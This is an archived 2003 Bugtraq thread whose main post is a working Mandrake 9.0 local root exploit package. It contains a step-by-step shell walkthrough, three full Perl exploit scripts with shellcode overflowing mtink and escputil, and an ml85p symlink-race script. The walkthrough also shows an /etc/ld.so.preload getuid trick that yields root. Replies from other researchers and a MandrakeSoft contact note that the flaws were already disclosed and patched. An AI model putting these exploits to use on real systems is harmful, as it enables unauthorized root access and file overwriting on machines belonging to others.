92052 2003-02-27 23:08 /261 rader/ Priv8 Security <xtc@priv8security.com>
Importerad: 2003-02-27 23:08 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <3718>
Ärende: Mandrake 9.0 local root exploit
------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------
Priv8 Security - www.priv8security.com
priv8mdk90.tar.gz - Mandrake 9.0 local root exploit
Based on Idefense adv.
http://www.idefense.com/advisory/01.21.03.txt
Greets to : coideloko, chroot-, xtc , M|ght, exitus,
overkill, blood_sucker, lkm, Brother
execk, printf, heap, diguin, n4rfy(nordico :ppp) and
all friends of Priv8 security.
OBS. My english sux...
------------------------------------------------------------------------------------------------------------------
Ok, our goal is to get root by exploiting ml85p thats
suid root by default on mdk 9.0
[wsxz@localhost priv8]$ ls -l /usr/bin/ml85p
-rwsr-x--- 1 root sys 12344 Set 17 16:40
/usr/bin/ml85p*
You can see that we gona need group sys to run it so
first lets get it.
[wsxz@localhost priv8]$ ls -l /usr/bin/mtink
-rwxr-sr-x 1 lp sys 132600 Set 17 16:40
/usr/bin/mtink*
[wsxz@localhost priv8]$ ls -l /usr/bin/escputil
-rwxr-sr-x 1 lp sys 32088 Set 17 16:40
/usr/bin/escputil*
We have two here that are vuln, mtink has a stack
overflow on env HOME and escputil
has a stack over too on command line arg, for more
details read idefense adv.
So here we go....
First we get gid sys by exploiting mtink or escputil, u
can choose what one u want to.
[wsxz@localhost priv8]$ id
uid=503(wsxz) gid=503(wsxz) grupos=503(wsxz)
[wsxz@localhost priv8]$ perl priv8mtink.pl
Priv8security.com Mandrake 9 mtink local sys exploit!!
usage: priv8mtink.pl offset
Using address: 0xbffffa80
sh-2.05b$ id
uid=503(wsxz) gid=3(sys) groups=503(wsxz)
And now we can exploit ml85p
1 - Writing any file on system!!!
sh-2.05b$ perl priv8ml85p.pl /root/hi-there-Mr-root
Let write some files ok ;p
Now just press enter ;)
Wrong file format.
file position: ffffffff
sh-2.05b$
Now we check if it worked....
[root@localhost root]# pwd
/root
[root@localhost root]# ls -l hi*
-rw-rw-rw- 1 root sys 0 Fev 24 03:32
hi-there-Mr-root
2 - Geting root with it ;)
I will do the same thing on idefense adv, so lets do it..
sh-2.05b$ id
uid=503(wsxz) gid=3(sys) groups=503(wsxz)
sh-2.05b$ perl priv8ml85p.pl /etc/ld.so.preload
Let write some files ok ;p
Now just press enter ;)
Wrong file format.
file position: ffffffff
sh-2.05b$ ls -l /etc/ld.so.preload
-rw-rw-rw- 1 root sys 0 Feb 26 00:12
/etc/ld.so.preload
sh-2.05b$ cd /tmp
sh-2.05b$ echo 'int getuid(void) { return 0; }' > lib.c
sh-2.05b$ export PATH="/usr/bin:/usr/sbin:/sbin:/bin"
sh-2.05b$ gcc -fPIC -c /tmp/lib.c
sh-2.05b$ gcc -o /tmp/lib.so -shared /tmp/lib.o
sh-2.05b$ echo "/tmp/lib.so" > /etc/ld.so.preload
sh-2.05b$ su -
[root@localhost root]# id
uid=0(root) gid=0(root) grupos=0(root)
It worked, so take care what u ll write ok ;)
that's it.
------------------------------------------------------------------------------------------------------------------
priv8escputil.pl
------------------------------------------------------------------------------------------------------------------
#!/usr/bin/perl
######################################################
#Priv8security.com escputil local sys exploit.
#
# Tested on Mandrake 9.0 only.
# Based on
http://www.idefense.com/advisory/01.21.03.txt
#
#####################################################
$shellcode =
"\x31\xc0\xb0". #setregid(x,x) - where x = x03 sys gid
"\x03". # x = x03 sys gid
"\x89\xc3\x89\xc1\xb0\x47\xcd\x80".#end setregid()
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69".
"\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
$size = 1050;
$retaddr = 0xbffff4e0;
$nop = "\x90";
$offset = 0;
if (@ARGV == 1) {
$offset = $ARGV[0];
}
print " Priv8security.com Mandrake 9 escputil local
sys exploit!!\n";
print " usage: $0 offset\n";
for ($i = 0; $i < ($size - length($shellcode) - 4);
$i++) {
$buffer .= $nop;
}
$buffer .= $shellcode;
print " Using address: 0x",
sprintf('%lx',($retaddr + $offset)), "\n";
$newret = pack('l', ($retaddr +
$offset));
for ($i += length($shellcode); $i <
$size; $i += 4) {
$buffer .= $newret;
}
exec("/usr/bin/escputil -c -P
$buffer");
------------------------------------------------------------------------------------------------------------------
priv8ml85p.pl
------------------------------------------------------------------------------------------------------------------
#!/usr/bin/perl
######################################################
#Priv8security.com ml85p local root exploit.
#
# This exploit erase any file on system, u ll need
group sys to do it
# so run priv8mtink.pl or priv8escputil.pl to get
it ;)
# Tested on Mandrake 9.0 only.
# Based on
http://www.idefense.com/advisory/01.21.03.txt
#
#####################################################
if (@ARGV == 1) {
$file = $ARGV[0];
$b = "/tmp/ml85g";
$b .= time();
exec(umask 000);
system("ln -s $file '$b'");
print "Lets write some files ok ;p\n";
print "Now just press enter....\n";
if (system("/usr/bin/ml85p -s") == -1){
print "You cant run ml85p, check
if u have gid sys...\n";
}
exit(1);
} else {
print "\n!!! Priv8security.com ml85p local
root exploit by wsxz !!!\n";
print " Usage: perl $0
file-to-overwrite\n\n";
}
------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------
priv8mtink.pl
------------------------------------------------------------------------------------------------------------------
#!/usr/bin/perl
######################################################
#Priv8security.com mtink local sys exploit.
#
# Tested on Mandrake 9.0 only.
# Based on
http://www.idefense.com/advisory/01.21.03.txt
#
#####################################################
$shellcode2 =
"\x31\xc0\xb0". #setregid(x,x) - where x = x03 sys gid
"\x03". # x = x03 sys gid
"\x89\xc3\x89\xc1\xb0\x47\xcd\x80".#end setregid()
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69".
"\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
$size = 1056;
$retaddr = 0xbffffa80;
$nop = "\x90";
$offset = 0;
if (@ARGV == 1) {
$offset = $ARGV[0];
}
print " Priv8security.com Mandrake 9 mtink local sys
exploit!!\n";
print " usage: $0 offset\n";
for ($i = 0; $i < ($size -
length($shellcode2) - 4); $i++) {
$buffer .= $nop;
}
$buffer .= $shellcode2;
print " Using address: 0x",
sprintf('%lx',($retaddr + $offset)), "\n";
$newret = pack('l', ($retaddr +
$offset));
for ($i += length($shellcode2); $i
< $size; $i += 4) {
$buffer .= $newret;
}
local($ENV{'HOME'}) = $buffer;
exec("/usr/bin/mtink");
------------------------------------------------------------------------------------------------------------------
(92052) /Priv8 Security <xtc@priv8security.com>/----
Kommentar i text 92179 av KF <dotslash@snosoft.com>
Kommentar i text 92253 av Vincent Danen <vdanen@mandrakesoft.com>
92179 2003-02-28 17:00 /23 rader/ KF <dotslash@snosoft.com>
Importerad: 2003-02-28 17:00 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <3722>
Kommentar till text 92052 av Priv8 Security <xtc@priv8security.com>
Ärende: Re: Mandrake 9.0 local root exploit
------------------------------------------------------------
A portion of this exploit scenario has already been disclosed in the
past. The tmp file issues in ml85p can be located at
http://www.securityfocus.com/bid/3008
Mandrake has released an advisory (MDKSA-2003:010) which contains
fixes:
The information contained below is the snippet from the iDEFENSE
advisory http://www.idefense.com/advisory/01.21.03.txt. This condition
has also already been exploited by SNOSoft with the help of Charles
Stevenson:
VULNERABILITY THREE: The ml85p binary, installed set user id root,
contains a race condition in its opening of temporary
files. Successful exploitation provides an attacker with the
ability to create or empty a file with super user privileges. The
following snippet contains the offending segment of code:
sprintf(gname,"/tmp/mlg85p%d",time(0));
if (!(cbmf = fopen(gname,"w+"))) {
-KF
(92179) /KF <dotslash@snosoft.com>/-------(Ombruten)
92253 2003-02-28 23:58 /32 rader/ Vincent Danen <vdanen@mandrakesoft.com>
Importerad: 2003-02-28 23:58 av Brevbäraren
Extern mottagare: Priv8 Security <xtc@priv8security.com>
Mottagare: Bugtraq (import) <3737>
Kommentar till text 92052 av Priv8 Security <xtc@priv8security.com>
Ärende: Re: Mandrake 9.0 local root exploit
------------------------------------------------------------
On Thu Feb 27, 2003 at 09:43:04PM -0000, Priv8 Security wrote:
> ------------------------------------------------------------------------------------------------------------------
> Priv8 Security - www.priv8security.com
>
> priv8mdk90.tar.gz - Mandrake 9.0 local root exploit
>
> Based on Idefense adv.
> http://www.idefense.com/advisory/01.21.03.txt
>
> Greets to : coideloko, chroot-, xtc , M|ght, exitus,
> overkill, blood_sucker, lkm, Brother
> execk, printf, heap, diguin, n4rfy(nordico :ppp) and
> all friends of Priv8 security.
>
> OBS. My english sux...
> ------------------------------------------------------------------------------------------------------------------
>
> Ok, our goal is to get root by exploiting ml85p thats
> suid root by default on mdk 9.0
What Priv8 Security neglected to mention in their advisory is that a
fix has been available since January 21st; the advisory is available
here:
http://www.mandrakesecure.net/en/advisories/advisory.php?name=MDKSA-2003:010
--
MandrakeSoft Security; http://www.mandrakesecure.net/
Online Security Resource Book; http://linsec.ca/
"lynx -source http://linsec.ca/vdanen.asc | gpg --import"
{FE6F2AFD : 88D8 0D23 8D4B 3407 5BD7 66F9 2043 D0E5 FE6F 2AFD}
(92253) /Vincent Danen <vdanen@mandrakesoft.com>/(Ombruten)
Bilaga (application/pgp-signature) i text 92254
92254 2003-02-28 23:58 /8 rader/ Vincent Danen <vdanen@mandrakesoft.com>
Importerad: 2003-02-28 23:58 av Brevbäraren
Extern mottagare: Priv8 Security <xtc@priv8security.com>
Mottagare: Bugtraq (import) <3738>
Bilaga (text/plain) till text 92253
Ärende: Bilaga till: Re: Mandrake 9.0 local root exploit
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (Darwin)
iD8DBQE+XqiDIEPQ5f5vKv0RAoY7AJ9yGq1mv6i3jMWzVXrpV0yyj3huzQCfdJhn
XEILdTVUFsKRIRHyP0EHKII=
=wD9m
-----END PGP SIGNATURE-----
(92254) /Vincent Danen <vdanen@mandrakesoft.com>/---